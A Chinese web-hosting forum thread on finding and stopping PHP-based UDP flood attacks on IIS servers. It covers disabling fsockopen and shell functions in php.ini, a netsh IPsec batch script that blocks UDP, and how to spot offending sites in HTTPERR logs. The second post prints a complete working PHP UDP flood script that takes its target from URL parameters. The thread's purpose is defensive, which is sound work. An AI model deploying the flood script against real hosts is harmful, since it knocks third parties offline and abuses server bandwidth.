淘主机论坛

 找回密码
 成为淘友

QQ登录

只需一步,快速开始

KT服务器促销中 100M带宽 10T流量 超值传送门:会员注册及发帖规则 发帖看过来
查看: 6634|回复: 2

[安全] PHP-UDP-DOS漏洞的解决与防范DDOS(叫停fsockopen)

[复制链接]
发表于 2011-6-27 23:23:24 | 显示全部楼层 |阅读模式
原理:

php脚本部分源码:
  1. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  2.         if($fp){
  3.                 fwrite($fp, $out);
  4.                 fclose($fp);
复制代码
php脚本中的 fsockopen 函数,对外部地址,通过UDP发送大量的数据包,攻击对方。

解决思路:

可通过 php.ini ,禁用 fsockopen 函数,及使用Windows 2003的 安全策略 屏蔽本机的UDP端口。

禁用函数具体方法:

找到C:\Windows目录下PHP.ini文件,查找到 disable_functions ,添加需禁用的函数名,如下例:

passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen

重启IIS后生效。

注意: 如果这里把fsocket,fsockopen,pfsockopen这三个函数禁止以后,可能导致服务器无法正常安装杰奇网站管理系统(PHP),Discuz!的UCenter可能无法通信正常,同时部分程序会导致无法采集。
安装的时候如果不行的话,大家可以临时把这几个屏蔽的函数去掉,安装后重新开启。
使用中不行,就只能自己有所取舍了。

屏蔽UDP端口

将以下着色文本复制到记事本,另存为 banudp.bat 或任意名,双击运行即可。

REM 添加安全策略,名称
netsh ipsec static add policy name=我的安全策略

REM 添加 IP筛选器列表
netsh ipsec static add filterlist name=允许列表
netsh ipsec static add filterlist name=拒绝列表

REM 添加筛选器到IP筛选器列表(允许上网)
netsh ipsec static add filter filterlist=允许列表  srcaddr=me dstaddr=209.11.240.36 description=dns访问 protocol=udp mirrored=yes dstport=53

REM 添加筛选器到IP筛选器列表(不让别人访问)
netsh ipsec static add filter filterlist=拒绝列表 srcaddr=any dstaddr=me description=别人到我任何访问 protocol=udp mirrored=yes

REM 添加筛选器操作
netsh ipsec static add filteraction name=可以  action=permit
netsh ipsec static add filteraction name=不可以  action=block

REM 创建一个链接指定 IPSec 策略、筛选器列表和筛选器操作的规则(加入规则到我的安全策略)
netsh ipsec static add rule name=允许规则  policy=我的安全策略 filterlist=允许列表 filteraction=可以
netsh ipsec static add rule name=拒绝规则  policy=我的安全策略 filterlist=拒绝列表 filteraction=不可以

REM 激活我的安全策略
netsh ipsec static set policy name=我的安全策略 assign=y
 楼主| 发表于 2011-6-27 23:25:55 | 显示全部楼层

防止用户利用PHP代码DOS造成用光网络带宽

特征:

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:


$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>


表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.


近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.


如何快速找到这些站?

你可以打开日志

C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
里面有类似这样的记录:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

最后三项 783 Disabled 30_FreeHost_1
783就是这个站在IIS中的ID
30_FreeHost_1就是所在池


解决办法:

1.按上述找到这个网站后停止它.或停止池,并重启IIS.

2.在IP策略,或防火墙中,禁止所有udp向外发送


为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址 "特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8" 保存后就行了 )

在2011-4-27,我们上传了新的安全包,里面有一个"星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec"文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)


3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)

4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS

disable_functions = fsockopen,gzinflate

但这样会造成很多php程序都不正常.

另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?
 楼主| 发表于 2012-5-9 11:04:44 | 显示全部楼层

禁用部分函数以后导致无法采集和程序无法安装的提示

禁用函数:

查找到 disable_functions ,添加需禁用的函数名,如下例:

passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
重启IIS后生效。

注意: 如果这里把fsocket,fsockopen,pfsockopen这三个函数禁止以后,可能导致服务器无法正常安装杰奇网站管理系统(PHP),Discuz!的UCenter可能无法通信正常,同时部分程序会导致无法采集。
安装的时候如果不行的话,大家可以临时把这几个屏蔽的函数去掉,安装后重新开启。
使用中不行,就只能自己有所取舍了。
您需要登录后才可以回帖 登录 | 成为淘友

本版积分规则

小黑屋|手机版|Archiver|淘主机

GMT+8, 2024-11-23 11:50

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表